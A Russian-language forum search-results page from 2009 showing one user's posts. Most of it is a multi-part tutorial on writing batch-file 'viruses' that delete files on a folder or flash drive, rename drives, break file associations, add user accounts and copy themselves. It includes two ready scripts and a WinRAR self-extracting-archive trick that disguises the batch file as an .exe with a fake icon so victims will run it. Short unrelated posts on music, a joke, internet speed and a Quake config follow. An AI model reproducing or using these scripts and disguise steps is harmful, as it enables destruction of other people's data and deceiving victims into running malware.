|
Форум Записи участника |
Результаты поиска |
|
SMOKED#2 | Тема: Самоучитель по созданию вирусов в блокнотеСамоучитель по созданию вирусов в блокноте Итак, приступим. Вы решили заняться вирусо-писательством. Сразу вам скажу, что эти вирусы, конечно, могут очень сильно навредить компьютеру, но полноценно передаваться с одного компьютера на другой они не могут. За все, что произойдет с вашим компьютером отвечаете вы и только вы. Приступим: 1) Открываем блокнот; 2) Пишем в нем «mspaint», без кавычек; 3) Сохраняем файл под любым именем, но вместо .txt мы напишем .bat; 4) Откроем файлик и увидим, что открылся Paint)) Вот и готова наша первая программка. Вместо «mspaint» можно вписать любую программу, например: Calc-калькулятор, Taskmgr-диспетчер задач… Но при чем здесь вирусы? - спросите вы. Ни при чем)) Следующее, что мы сделаем, это программа для изменения времени на компьютере, да и еще она будит копировать себя на флешку (если та вставлена). Итак: Пишем в блокноте: time 00:00 copy %0 F:\Work.bat Первой сточкой мы изменяем время на 00:00, а второй скопируем файл на диск Ф - флешка с именем Work. Не забудьте, сохранить блокнотовский файл в формате .bat. Вместо времени можно изменить и дату «Date 13.06.23». Написав такую строчку, мы изменим дату на 2023 год, 6 месяц, 13 число)) Теперь небольшой перечень того, что можно писать в блокнотовском вирусе. СПИСОК: 1) «copy %0 x:\y» - копирует вирус на диск x в папку y (пример copy %0 C:\System.bat); 2) «label x:y» - переименовывает диск x на имя y (пример label C:Disc error); 3) «time х:у» - меняет время на х часов и у минут (пример time 14:27); 4) «date x.y.z» - меняет дату на x день, y месяц, z год (пример date 16.11.05); 5) «md х» - создаст папку, в том месте, где наш вирус, с именем х (пример md Papka); 6) «del *.* /q» - удалит все файлы (наш вирус тоже) в папке, где лежит наш вирус (кроме папок); 7) «del x:\y *.* /q» - удалит все файлы на диске х в папке у (кроме папок) (пример del F:\Data*.* /q); 8) «assoc .х=.у» - переделает все файлы, на компьютере, форматом х на у (пример assoc .exe=.mp3); 9) «net user "х" /add» - добавит на компьютер пользователя под именем х (пример net user "Smoked" /add); Вот две программки вам на рассмотрение, можете их использовать без моего соглашения, но, используя их, вы принимаете соглашение пользователя. 1) Программа для удаления файлов с флешки (если та вставлена) и переименования ее. del F:\ *.* /q label F:HACK 2) Программа для изменения даты и времени на компьютере и копирования ее на диск C и на флешку. time 14:13 date 11.07.12 copy %0 C:\Time.bat copy %0 F:\Time.bat На этом сегодняшний урок закончен. Ждите второй части. С уважением SMOKED! [email protected] Добавлено (19 Февраль 2009, 20:34) Самоучитель по созданию вирусов в блокноте (продолжение) Приступим. Вы уже умеете создавать простенькие вирусы. Он умеет: менять время, дату, названия дисков и флешек, открывать программы, создавать папки, копировать себя, добавлять пользователей, менять расширения и уничтожать информацию. Это довольно небольшой список, чесно говоря. В этой части я научу вас некоторым тонкостям вирусописательсва. Допустим, вы уже сделали вирус, но выглядит он довольно некрасиво . Ну кто откроет непонятный файл? Вы правы, таких людей на свете не много. Как же изменить формат из .bat на .exe и добавить иконку. Очень легко (Нужно чтобы на компьютере был WinRAR). Находим любой вирус с расширением .bat, нажимаем на него правой кнопкой, жмем «Добавить в архив…». Ставим галочку «Создать SFX-архив», выбираем вкладку дополнительно, и кликаем на кнопку «Параметры SFX…». В окне «Выполнить после распаковки» пишем названия вируса (пример Virus.bat) а в окне «Текст и графика» далее «Загрузить значок SFX из фала». Жмем «Обзор» и ищем любой значок формата .ico (немного значков есть в папке самоучителя). Теперь жмем ОК. Готово)) Формат .exe, а не .bat, как нам и надо было. Теперь можно делать с вирусами что угодно. А что именно, решать уже вам. Хотите научиться еще командам, которыми можно просто добить нашего «лоха», открываем www.Google.ru, пишем bat вирусы и жмем «Искать». На этом сегодняшний урок закончен. С уважением SMOKED! [email protected] Добавлено (19 Февраль 2009, 20:35) Самоучитель по созданию вирусов в блокноте (часть 3) Привет, читатель. В этой части я буду давать советы по созданию твоих вирусов: как сделать их более сильными, точными и скрытыми. Приступим. Допустим, вы написали вирус, который будет портить открытую от папок информацию и немного вредить: |
|
SMOKED#4 | Тема: [МУЗЫКА] GorillazМне нужна ваша помощь! Gorillaz очень круто поет! Минуса простто супер))) Мне нужно скачать песню, там типа:
I am happy, some най-най-най i am happy най-най-най-най и т.д. кто понял о чем я дайте плиз! |
|
SMOKED#6 | Тема: [ЮМОР] Чёрный юмор- Вовочка, мы с папой решили купить тебе братика.
- Мамочка, возьми мою копилку и лучше сделай себе аборт. Легенды про Вовочку. Датируется IV веком до нашей эры. |
|
SMOKED#8 | Тема: Какой у вас инет и его скорость?PeopleNET 56 Kbps (7 Kb/sec) просто ужас но приходиться с этим жить)) И еще и 1 мб=10 копеек))
|
|
SMOKED#10 | Тема: Quake 1Не мне все таки 1 часть больше нравиться! Там секреты эксклюзивные! Там можно сделать много чего интересней! Да и графика на той век была идеальной)) Мой маленький конфиг:
crosshair 1 viewsize 100 bind mouse1 +attack bind mouse3 +zoom bind mwheelup "impulse 10" bind mwheeldown "impulse 12" alias taunt "+jump;say YABADABADOO!;wait;-jump" bind ENTER taunt |
| ||
| ||